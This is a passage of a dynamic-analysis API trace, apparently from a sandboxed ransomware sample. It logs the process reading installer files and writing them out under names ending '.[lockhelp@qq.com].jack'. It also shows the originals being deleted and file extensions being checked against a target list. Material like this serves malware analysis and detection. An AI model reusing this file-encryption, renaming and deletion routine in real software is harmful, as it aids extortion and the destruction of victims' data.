CloseHandle (hObject=0x408) returned 1 [0197.451] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 0x80 [0197.451] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.451] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.451] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.452] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.452] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.452] GetLastError () returned 0x0 [0197.452] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x10a82, lpOverlapped=0x0) returned 1 [0197.511] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x10a90, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x10a90, lpOverlapped=0x0) returned 1 [0197.513] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.513] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.513] SetEndOfFile (hFile=0x414) returned 1 [0197.514] CloseHandle (hObject=0x414) returned 1 [0197.516] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.516] SetEndOfFile (hFile=0x408) returned 1 [0197.517] CloseHandle (hObject=0x408) returned 1 [0197.517] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.518] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 1 [0197.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.518] lstrlenW (lpString=".doc") returned 4 [0197.518] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.518] lstrlenW (lpString=".docx") returned 5 [0197.518] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.518] lstrlenW (lpString=".pdf") returned 4 [0197.518] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.518] lstrlenW (lpString=".xls") returned 4 [0197.518] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.518] lstrlenW (lpString=".xlsx") returned 5 [0197.518] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.519] lstrlenW (lpString=".ppt") returned 4 [0197.519] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString=".zip") returned 4 [0197.519] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.519] lstrlenW (lpString=".rar") returned 4 [0197.519] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString=".bz2") returned 4 [0197.519] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString=".7z") returned 3 [0197.519] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString=".dbf") returned 4 [0197.519] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString=".1cd") returned 4 [0197.519] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString=".jpg") returned 4 [0197.519] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.519] lstrlenW (lpString=".doc") returned 4 [0197.519] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.519] lstrlenW (lpString=".docx") returned 5 [0197.519] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.519] lstrlenW (lpString=".pdf") returned 4 [0197.520] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString=".xls") returned 4 [0197.520] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString=".xlsx") returned 5 [0197.520] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.520] lstrlenW (lpString=".ppt") returned 4 [0197.520] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.520] lstrlenW (lpString=".zip") returned 4 [0197.520] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.520] lstrlenW (lpString=".rar") returned 4 [0197.520] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString=".bz2") returned 4 [0197.520] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString=".7z") returned 3 [0197.520] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.520] lstrlenW (lpString=".dbf") returned 4 [0197.520] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.520] lstrlenW (lpString=".1cd") returned 4 [0197.520] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0197.520] lstrlenW (lpString=".jpg") returned 4 [0197.520] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.521] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.521] lstrlenW (lpString="eula.rtf") returned 8 [0197.521] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.535] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3546) returned 1 [0197.535] CloseHandle (hObject=0x3f0) returned 1 [0197.535] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 0x80 [0197.535] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.535] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.536] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.536] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.536] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.536] GetLastError () returned 0x0 [0197.536] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xdda, lpOverlapped=0x0) returned 1 [0197.538] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xde0, lpOverlapped=0x0) returned 1 [0197.539] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.539] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.539] SetEndOfFile (hFile=0x420) returned 1 [0197.539] CloseHandle (hObject=0x420) returned 1 [0197.542] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.542] SetEndOfFile (hFile=0x3f0) returned 1 [0197.543] CloseHandle (hObject=0x3f0) returned 1 [0197.543] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.543] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 1 [0197.544] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.544] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.544] lstrlenW (lpString=".doc") returned 4 [0197.544] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.544] lstrlenW (lpString=".docx") returned 5 [0197.544] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.544] lstrlenW (lpString=".pdf") returned 4 [0197.544] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.544] lstrlenW (lpString=".xls") returned 4 [0197.544] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.544] lstrlenW (lpString=".xlsx") returned 5 [0197.544] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.544] lstrlenW (lpString=".ppt") returned 4 [0197.544] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.544] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.544] lstrlenW (lpString=".zip") returned 4 [0197.544] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.544] lstrlenW (lpString=".rar") returned 4 [0197.544] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.544] lstrlenW (lpString=".bz2") returned 4 [0197.544] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.544] lstrlenW (lpString=".7z") returned 3 [0197.545] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString=".dbf") returned 4 [0197.545] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString=".1cd") returned 4 [0197.545] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString=".jpg") returned 4 [0197.545] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString=".doc") returned 4 [0197.545] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString=".docx") returned 5 [0197.545] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.545] lstrlenW (lpString=".pdf") returned 4 [0197.545] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString=".xls") returned 4 [0197.545] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.545] lstrlenW (lpString=".xlsx") returned 5 [0197.545] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.545] lstrlenW (lpString=".ppt") returned 4 [0197.545] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.545] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.545] lstrlenW (lpString=".zip") returned 4 [0197.545] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.545] lstrlenW (lpString=".rar") returned 4 [0197.546] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.546] lstrlenW (lpString=".bz2") returned 4 [0197.546] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.546] lstrlenW (lpString=".7z") returned 3 [0197.546] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.546] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.546] lstrlenW (lpString=".dbf") returned 4 [0197.546] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.546] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.546] lstrlenW (lpString=".1cd") returned 4 [0197.546] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.546] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0197.546] lstrlenW (lpString=".jpg") returned 4 [0197.546] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.546] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.546] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.546] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.546] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=79634) returned 1 [0197.547] CloseHandle (hObject=0x3f0) returned 1 [0197.547] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 0x80 [0197.547] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.547] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.547] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.547] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.547] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.547] GetLastError () returned 0x0 [0197.547] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x13712, lpOverlapped=0x0) returned 1 [0197.784] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13720, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13720, lpOverlapped=0x0) returned 1 [0197.786] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.786] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.786] SetEndOfFile (hFile=0x420) returned 1 [0197.787] CloseHandle (hObject=0x420) returned 1 [0197.790] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.790] SetEndOfFile (hFile=0x3f0) returned 1 [0197.791] CloseHandle (hObject=0x3f0) returned 1 [0197.792] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.792] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 1 [0197.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.792] lstrlenW (lpString=".doc") returned 4 [0197.792] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.792] lstrlenW (lpString=".docx") returned 5 [0197.792] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.792] lstrlenW (lpString=".pdf") returned 4 [0197.792] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.792] lstrlenW (lpString=".xls") returned 4 [0197.792] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.792] lstrlenW (lpString=".xlsx") returned 5 [0197.792] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.792] lstrlenW (lpString=".ppt") returned 4 [0197.792] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.792] lstrlenW (lpString=".zip") returned 4 [0197.792] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.792] lstrlenW (lpString=".rar") returned 4 [0197.792] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString=".bz2") returned 4 [0197.793] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString=".7z") returned 3 [0197.793] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString=".dbf") returned 4 [0197.793] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString=".1cd") returned 4 [0197.793] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString=".jpg") returned 4 [0197.793] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString=".doc") returned 4 [0197.793] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString=".docx") returned 5 [0197.793] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.793] lstrlenW (lpString=".pdf") returned 4 [0197.793] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString=".xls") returned 4 [0197.793] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString=".xlsx") returned 5 [0197.793] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.793] lstrlenW (lpString=".ppt") returned 4 [0197.793] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.793] lstrlenW (lpString=".zip") returned 4 [0197.793] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.794] lstrlenW (lpString=".rar") returned 4 [0197.794] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.794] lstrlenW (lpString=".bz2") returned 4 [0197.794] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.794] lstrlenW (lpString=".7z") returned 3 [0197.794] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.794] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.794] lstrlenW (lpString=".dbf") returned 4 [0197.794] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.794] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.794] lstrlenW (lpString=".1cd") returned 4 [0197.794] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.794] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0197.794] lstrlenW (lpString=".jpg") returned 4 [0197.794] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.794] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.794] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.794] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=80738) returned 1 [0197.794] CloseHandle (hObject=0x3f0) returned 1 [0197.795] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 0x80 [0197.795] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.795] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.795] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.795] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.795] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.795] GetLastError () returned 0x0 [0197.795] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x13b62, lpOverlapped=0x0) returned 1 [0197.846] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13b70, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13b70, lpOverlapped=0x0) returned 1 [0197.847] ReadFile (in: hFile=0x3f0, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.848] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.848] SetEndOfFile (hFile=0x420) returned 1 